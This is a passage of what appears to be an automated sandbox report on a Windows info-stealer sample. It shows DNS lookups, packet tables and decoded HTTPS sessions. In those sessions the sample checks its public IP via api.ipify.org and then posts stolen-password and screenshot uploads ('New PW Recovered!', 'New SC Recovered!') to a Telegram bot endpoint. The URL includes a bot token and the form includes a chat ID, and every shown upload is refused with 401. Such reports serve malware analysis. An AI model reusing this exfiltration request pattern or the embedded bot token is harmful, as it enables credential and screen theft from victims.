                                                Jul 26, 2024 00:03:11.861268997 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:11.861310959 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:11.861704111 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:11.862206936 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:11.862215042 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.473069906 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.476571083 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:12.476583958 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.776642084 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.777057886 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:12.777074099 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.777446985 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:12.777462006 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.777539968 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:12.777878046 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:12.778415918 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:13.121032000 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:13.121134043 CEST44349755149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:13.121449947 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:13.121941090 CEST49755443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:14.373706102 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:14.373759031 CEST44349756149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:14.373889923 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:14.374238014 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:14.374248981 CEST44349756149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:15.014398098 CEST44349756149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:15.058670044 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.364952087 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.364976883 CEST44349756149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:16.397814989 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.397914886 CEST44349756149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:16.397995949 CEST49756443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.398122072 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.398159027 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:16.398227930 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.398487091 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:16.398494005 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.038391113 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.038465977 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.039900064 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.039906979 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.040237904 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.041723967 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.084495068 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.387037039 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.387085915 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.387135029 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.387154102 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.387186050 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.387198925 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.387254953 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.387329102 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.387459040 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.388008118 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.433679104 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.733129025 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.733248949 CEST44349757149.154.167.220192.168.2.6
                                                Jul 26, 2024 00:03:17.733315945 CEST49757443192.168.2.6149.154.167.220
                                                Jul 26, 2024 00:03:17.733756065 CEST49757443192.168.2.6149.154.167.220
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 25, 2024 23:59:14.991641045 CEST5558953192.168.2.61.1.1.1
                                                Jul 25, 2024 23:59:14.998450041 CEST53555891.1.1.1192.168.2.6
                                                Jul 25, 2024 23:59:16.223233938 CEST4920753192.168.2.61.1.1.1
                                                Jul 25, 2024 23:59:16.302690983 CEST53492071.1.1.1192.168.2.6
                                                Jul 26, 2024 00:00:51.841928959 CEST5987853192.168.2.61.1.1.1
                                                Jul 26, 2024 00:00:51.851747036 CEST53598781.1.1.1192.168.2.6
                                                Jul 26, 2024 00:02:07.268716097 CEST5292853192.168.2.61.1.1.1
                                                Jul 26, 2024 00:02:07.276221991 CEST53529281.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 25, 2024 23:59:14.991641045 CEST192.168.2.61.1.1.10x5350Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Jul 25, 2024 23:59:16.223233938 CEST192.168.2.61.1.1.10xb73bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                Jul 26, 2024 00:00:51.841928959 CEST192.168.2.61.1.1.10x3325Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                Jul 26, 2024 00:02:07.268716097 CEST192.168.2.61.1.1.10x5104Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 25, 2024 23:59:14.998450041 CEST1.1.1.1192.168.2.60x5350No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Jul 25, 2024 23:59:14.998450041 CEST1.1.1.1192.168.2.60x5350No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Jul 25, 2024 23:59:14.998450041 CEST1.1.1.1192.168.2.60x5350No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Jul 25, 2024 23:59:16.302690983 CEST1.1.1.1192.168.2.60xb73bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                Jul 26, 2024 00:00:51.851747036 CEST1.1.1.1192.168.2.60x3325No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                Jul 26, 2024 00:02:07.276221991 CEST1.1.1.1192.168.2.60x5104No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                • api.ipify.org
                                                • api.telegram.org
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649716104.26.13.2054435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 21:59:15 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-07-25 21:59:15 UTC211INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 21:59:15 GMT
                                                Content-Type: text/plain
                                                Content-Length: 11
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8a8f6a828de03344-EWR
                                                2024-07-25 21:59:15 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                Data Ascii: 8.46.123.33


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649717149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 21:59:16 UTC260OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcacd37f51b3f3
                                                Host: api.telegram.org
                                                Content-Length: 975
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 21:59:17 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 21:59:17 UTC975OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 33 37 66 35 31 62 33 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 33 37 66 35 31 62 33 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 35 2f 32 30 32 34 20 31 37 3a 35 39 3a 31 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcacd37f51b3f3Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcacd37f51b3f3Content-Disposition: form-data; name="caption"New PW Recovered!Time: 07/25/2024 17:59:15User
                                                2024-07-25 21:59:19 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 21:59:19 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.649728149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:00:52 UTC238OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb9d07bd4088f
                                                Host: api.telegram.org
                                                Content-Length: 59488
                                                Expect: 100-continue
                                                2024-07-25 22:00:52 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:00:52 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 64 30 37 62 64 34 30 38 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 64 30 37 62 64 34 30 38 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 31 2f 32 30 32 34 20 30 36 3a 33 30 3a 31 34 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb9d07bd4088fContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcb9d07bd4088fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/11/2024 06:30:14User
                                                2024-07-25 22:00:52 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:00:52 UTC16355OUTData Raw: 62 2b 04 41 0c 08 49 05 5f 2a 37 67 db 70 e0 f3 cf 34 9a f0 4b 6d 7f 7d 0c 4b e4 7d 9d ce dc 71 0c ab 22 06 51 e9 c3 64 7b 1f 63 4e 9e 2b e9 e6 59 5e ea 35 91 66 59 f7 47 0a 26 e7 1d 19 b6 a8 dc 47 be 69 91 59 cf 6f 6f 34 56 d7 3e 5a ce 41 95 76 82 1c 83 91 90 47 ad 79 31 c3 e2 12 df fa d0 f7 5e 2f 0a ed 75 fd 6a 58 bf 17 96 9a 73 3c ba 7c d0 0b 41 11 92 77 88 aa c9 e6 0f 9b 93 c1 da c5 47 e7 50 6a 17 53 f9 7a bc 10 ad a2 47 63 95 d8 e9 fb e6 50 c0 6f 0d b7 a9 27 a6 ee fc 0a 6f f6 7b 66 79 0c c4 cb 70 19 66 62 a0 ef 0d c9 ed eb 4b 3d ad cc f6 cd 6e f7 0a 51 90 23 3f 96 be 63 28 20 80 5f 1b 88 e0 70 4f 61 57 ec 71 1d 59 0b 13 84 be 8a df e4 bf cc bb a9 5c 41 0e a7 71 70 b1 2a d9 c0 ce 26 45 18 50 d1 90 36 fb 6e ca 7f df 47 d2 a1 bf bb 36 97 d3 98 d6 da 3f
                                                Data Ascii: b+AI_*7gp4Km}K}q"Qd{cN+Y^5fYG&GiYoo4V>ZAvGy1^/ujXs<|AwGPjSzGcPo'o{fypfbK=nQ#?c( _pOaWqY\Aqp*&EP6nG6?
                                                2024-07-25 22:00:52 UTC16355OUTData Raw: 28 00 a2 8a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 45 14 50 01 45 14 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 50 69 80 51 45 14 00 52 51 45 03 0a 28 a4 a0 02 8a 28 a0 02 8a 28 a0 61 45 14 1a 00 28 a2 8a 00 4a 28 a2 80 0a 4a 5a 28 18 94 51 45 00 14 94 b4 50 31 28 a2 8a 60 14 51 45 00 14 94 b4 94 00 51 45 14 c0 4a 28 a2 81 85 14 51 40 05 25 2d 14 0c 4a 29 69 28 00 a4 a5 a2 98 09 45 2d 25 20 12 8a 5a 29 8c 4a 29 69 28 00 a2 8a 28 01 28 a5 a2 98 c4 a2 96 8a 00 4e f5 a5 3f 12 91 ec 3f 95 67 0e b5 a5 3f fa df c0 7f 2a ca 7f 12 05 b9 15 14 b4 50 58 94 52 d2 53 18 51 45 14 00 51 45 14 00 51 45 14 00 94 0a 5a 4a 00 28 a5 a4 a0 06 c9 fe a6 5f f7 0d 56 b3 ff 00 5a df 4a b5 27 fa 99 7f dc aa b6 5f eb 1b e9 42 ea 05 ba 28 a2 80 0a 29 68 a0 04
                                                Data Ascii: (((((aEPEPQKI@Q@Q@Q@PiQERQE(((aE(J(JZ(QEP1(`QEQEJ(Q@%-J)i(E-% Z)J)i(((N??g?*PXRSQEQEQEZJ(_VZJ'_B()h
                                                2024-07-25 22:00:52 UTC9349OUTData Raw: 61 77 2d e5 9d fd ac 0b 73 e4 1f 9a 16 ef 5a 49 6b 0d ee 8b 0d bc eb ba 37 85 01 fc 87 35 9d 14 7a f6 98 a2 08 92 2d 42 dd 78 42 cf b1 c0 f4 39 af 16 9c f4 56 dd 77 ea 8f ac a9 0d 5a 7b 3e dd 18 9e 1c b1 bb 8a ee f2 fa ea 05 b6 f3 c8 db 12 f6 a8 ac 58 4e de 21 bb 8f 98 64 05 15 bd 76 a9 cf f3 15 34 b1 eb ba 9a 98 25 48 b4 fb 76 e1 ca be f7 23 d0 62 af cb 6b 0d 96 87 3d bc 0b b6 34 81 c0 fc 8f 34 54 9e 8e fb be dd 10 53 86 a9 2d 97 7e ac e2 28 a2 8a f6 cf 93 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 29 28 a0 05 e2 92 8a 28 00 a2 8a 28 18 52 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 49 45 14 0c 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 01 45 14 94 0c 28 a2 8a 00 4a 28 a2 81 85
                                                Data Ascii: aw-sZIk75z-BxB9VwZ{>XN!dv4%Hv#bk=44TS-~(((((((()(((RR@EPEPEPIE()((Q@EPEPE(J(
                                                2024-07-25 22:00:52 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 64 30 37 62 64 34 30 38 38 66 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb9d07bd4088f--
                                                2024-07-25 22:00:53 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:00:53 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.649730149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:00:57 UTC238OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcbd2f89f881a1
                                                Host: api.telegram.org
                                                Content-Length: 57562
                                                Expect: 100-continue
                                                2024-07-25 22:00:57 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:00:57 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 32 66 38 39 66 38 38 31 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 32 66 38 39 66 38 38 31 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 35 2f 32 30 32 34 20 31 33 3a 32 38 3a 32 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcbd2f89f881a1Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcbd2f89f881a1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/15/2024 13:28:21User
                                                2024-07-25 22:00:57 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:00:57 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:00:57 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:00:57 UTC7423OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:00:57 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 32 66 38 39 66 38 38 31 61 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcbd2f89f881a1--
                                                2024-07-25 22:00:58 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:00:58 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.649731149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:00:58 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcbf70b25255b6
                                                Host: api.telegram.org
                                                Content-Length: 57562
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:00:59 UTC25INHTTP/1.1 100 Continue
